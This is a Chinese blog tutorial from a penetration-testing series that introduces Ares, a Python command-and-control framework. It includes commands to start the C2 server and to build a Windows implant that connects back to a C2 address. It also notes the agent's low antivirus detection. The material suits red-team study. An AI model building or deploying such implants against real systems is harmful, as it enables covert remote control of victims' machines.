【基础篇】————21、隐匿攻击之Web Interface

于 2019-05-26 19:39:54 发布
阅读量785 收藏 2
点赞数
分类专栏: 【内网渗透】 # 基础篇

红队评估的高要求使得安全公司和安全顾问对有不同功能的命令和控制工具的开发工具产生了极大的兴趣。其中一些工具可用于官方活动,而其他一些工具仅用于研究目的。

Ares是一个用Python编写的命令和控制工具,由Kevin Locati开发。它有一个在8080端口上运行的Web界面,它受密码和密码保护。必须在运行服务器之前创建数据库。

./ares.py initdb
./ares.py runserver -h 0.0.0.0 -p 8080 --threaded

一旦密码被设置,Ares将要求使用密码短语。

Ares的主界面只包含三个功能:

  1. 代理商名单
  2. 更改密码
  3. 断开

代理列表是运行植入物的所有受感染主机将出现的页面。

在配置代理文件夹中的代理配置之前,必须将SERVER变量更改为命令和控制服务器正在运行的IP地址。config.py

如果安装了wine(Ares存储库包含wine setup脚本),则可以通过运行以下命令以可执行格式构建代理:

./builder.py -p Windows --server http://192.168.1.203:8080 -o agent.exe

运行代理的主机将以以下格式显示在代理列表中。

可以从字段在目标主机上执行命令,并在控制台窗口中检索输出。

除了目标主机上的一些基本命令执行之外,Ares不提供其他功能。然而,该代理商当时对许多防病毒软件的检测率较低。

FLy_鹏程万里
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Mitmproxy工具之Web Interface教程
qq_33581509的博客
05-01 1177
Mitmproxy工具之Web Interface教程
Web Interface实现自动启动应用程序
weixin_34281537的博客
02-25 221
修改Web Interface来实现在单应用程序的情况下自动启动应用程序,免去用户点击启动的过程。 原理比较清楚,Web Interface同时支持XenDesktop虚拟桌面的接入,而XenDesktop有这样一个默认的策略,如果用户只有一个可用桌面,那么桌面会自动启动。 基于这个原理和思想,我们只要把把XenDesktop资源的检测启动机制,修改成应用,就可以实现自动...
Hive2.1.0的 Web Interface配置
cuihaolong的专栏
07-29 2427
首先需要从官网下载与当前Hive版本相对应的src文件,并进入到hive/hwi目录下,将web打包成war格式的压缩包,使用命令:jar cfM hive-hwi-2.1.0.war -C web . 将压缩包复制到hive/lib/目录下,并配置hive-site.xml中的相关内容     hive.hwi.listen.host     0.0.0.0     This is
WebInterface 登录事件审核查询
weixin_34059951的博客
11-20 106
最近有客户有要求,希望能统计登录Web Interface服务器登录审核日志,通过请教,可以用以下方式解决,在这里写出来,希望能对大家有所帮助。 从惯性上说,也许有一些新手朋友认为这个审核日志应该是去WI服务器上去查询。但是如果对WI工作原理有些了解的话,应该明白应该从XML服务器上去找根据。 如图,我们可以看到Farm1有两台XML服务器。 接下来,我们应该...
Web Interface5.4配置
10-15
CitRix、XenApp、Web Interface5.4配置,思杰应用虚拟化外网组件
java基础——java的起源与演变
07-14
Java 的跨平台原理: Java 源代码---编译--->java 字节码(可跨平台) ---运行--->JVM(java 虚拟机)→Windows,Linux 等平台。JVM 屏蔽了底层运行平台的差别,实现了“以此编译,随处运行”。 垃圾回收器: 不...
java基础——入门
07-14
因为在jdk下bin文件夹中有很多我们在开发中要使用的工具如javaexejavacexejarex等那么我们在使用时想要在电脑的任意位置下使用这些java开发工具那么我们就需有把这些工具所在的路径配置到系统的环境变量中当我们使用...
Spark性能优化指南——基础
02-25
在大数据计算领域,Spark已经成为了越来越流行、越来越受欢迎的计算平台之一。Spark的功能涵盖了大数据领域的离线批处理、SQL类处理、流式/实时计算、机器学习、图计算等各种不同类型的计算操作,应用范围与前景非常...
Citrix WebInterface 配置向导
weixin_34258078的博客
12-13 357
原文出处:http://vdi.so/blog/?p=3913 环境要求: 准备好一台已经安装好的webinterface的计算机 配置步骤: 首先,在安装webinterface的机器上,点击开始,选择左右程序,然后选择citrix选择管理控制台: 然后点击,Citrix Web Interface管理,点击后,出现如下画面: 如果安装Web...
mySQLweb - web interface to MySQL-开源
05-13
mySQLweb是用于建立对MySQL数据库SQL查询的Web界面。 查询构建器允许用户添加和删除表,设置关系,应用条件等。结果在表中输出。 外观易于更改-它只是CSS格式的XHTML。
Citrix组件web interface功能介绍(一)
weixin_33971130的博客
07-13 608
在Citrix Xenapp5FP2 for2003..那上已经讲了,如何安装webinterface了.后面就用wi带代替web interface来说.个人感觉wi还是主要靠iis实现功能,分享一些wi的实用功能吧.先测试server farms:server farms介绍差不多了,下一个是身份验证:这里介绍推荐大家去citrix的edocs查询http://supp...
app接口 web接口简单理解
热门推荐
白及
05-26 1万+
1  j2ee的web工程开发中,接口的意思 两个不同的j2ee的web工程,A和B,A工程如果要访问B工程中的某个函数方法,这就要通过接口的形式进行访问,即通过webservice的方式(如webservice的框架axis等)。 即发起一个http url请求,传入参数是什么,得到什么返回结果。 2 app研发中的接口,意思是,app端发起一个http url请求,传入参数是什么
Web Interface 5.4打造全新登陆界面
weixin_33991727的博客
05-11 124
熟悉了以前Citrix登陆界面的全黑的经典和后来白色的主题, 也许很多人对这两种主题也不一定满意。 Web Interface 5.4出来后,打破了以前的登陆界面,带来了一种全新的界面。 如图:   一种全新的感觉和体验, 如果想拥有升级到这种界面, 如下步骤: 1、到官方下载Web Interface 5.4 2、点击更新 更新完成后,你可以看到原先的站点也在其中列出来了...
hwi(hive web interface)-hive web页面的搭建
十色花的博客
06-29 1142
简介 hwi(hive web interface)是hive命令行接口的一个补充,主要功能包括:1.shema browsing :获取table的信息,包括serde、columen name、column type2.detached query execution:在hive命令行界面,用户如果需要执行多个查询,则需要同时打开多个命令行界面。hwi允许用户同时开始多个查询,并且查看执行状态...
WebService实例实现天气预报等
theOne1207的博客
03-31 1502
简单实例实现天气预报的功能    1.了解WebService工作        服务端 查询数据库中用户功能            新建一个Dynamic Web Project            编写一个带有查询用户方法的接口,并写好实现类。            @WebService public interface WebServiceInterfaceTest { User q...
浅谈 接口(Interface)的作用
黑不溜秋 白里透红
06-12 1337
继承"基类"跟继承"接口"都能实现某些相同的功能,但有些接口能够完成的功能是只用基类无法实现的1.接口用于描述一组类的公共方法/公共属性. 它不实现任何的方法或属性,只是告诉继承它的类《至少》要实现哪些功能,继承它的类可以增加自己的方法. 2.使用接口可以使继承它的类: 命名统一/规范,易于维护.比如: 两个类 "狗"和"猫",如果它们都继承了接口"动物",其中动物里面有个方法Behavior()
Citrix Web Interface 设置本地安装Receiver操作指南
weixin_34248487的博客
03-19 957
一台计算机从来没有使用过Citrix的任何服务的话,首次打开“Web Interface”的话,会出现如下的界面。如下图 点击上图中的网页正中央的绿色“安装”按钮后,会直接弹出如下图所示的Citrix 官方网站的下载频道。用户需要自行从网站中找到适合版本的“Citrix Receiver”下载并安装。如下图 但是,对于一般使用者来说,正确找到适合的“Citrix ...
WebService Interface
sgear
08-07 3345
WebService Interface? 什么东西? 为什么要这个玩意儿,它有什么用?有这样一种情况: 我有一个Client程序,要引用到多个Web Service,这一些Web Service的调用方式是一样的,只是各自Web Service本身的实现有一些区别.那么,对于Client来说,最好的调用方式就是这样的:IObj obj = new WebService1();obj.In
groovy 字符串截取最后一个_Java基础——字符串详解
最新发布
06-03
def str = "Java_基础——字符串详解" def lastIndex = str.lastIndexOf("_") def result = str.getAt(lastIndex+1..-1) println result ``` 输出结果为: ``` 字符串详解 ``` 这段代码首先使用 lastIndexOf() ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值